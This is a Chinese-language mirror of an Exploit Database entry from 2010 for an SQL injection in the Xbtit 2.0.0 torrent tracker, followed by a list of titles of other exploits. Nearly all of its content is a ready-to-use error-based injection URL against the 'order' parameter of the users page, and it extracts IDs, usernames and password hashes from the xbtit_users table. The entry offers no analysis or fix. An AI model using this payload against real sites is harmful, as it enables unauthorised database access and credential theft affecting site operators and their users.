Xbtit 2.0.0 – SQL Injection

Exploit Database
19 阅读

作者： Ctacok

日期： 2010-03-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11718/

####################################################
# Title : Xbtit SQL Injection Vulnerability#
# Author: Ctacok #
# Homepage: http://ctacok.ru/#
####################################################
 
####################################################
#Vulnerable File : 
 /index.php?page=users&order=[SQL]&by=ASC
 
####################################################
#ExploiT : 
 
/index.php?page=users&order=flag+or(1,1)=(select+count(0),concat((select+concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a)+from+xbtit_users+limit+1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--++&by=ASC

####################################################

last Exploits
Xbtit 2.0.0 – SQL Injection的更多信息

allocPSA 1.7.4 – ‘/login/login.php’ Cross-Site Scripting：
PHP Melody 3.0 – ‘Multiple’ Cross-Site Scripting (XSS)：
Umbraco CMS – Remote Command Execution (Metasploit)：
ManageEngine ADSelfService Plus 6.1 – CSV Injection：
SWFupload – ‘movieName’ Cross-Site Scripting：
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution：
Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation：
GetSimple CMS My SMTP Contact Plugin 1.1.2 – Persistent Cross-Site Scripting：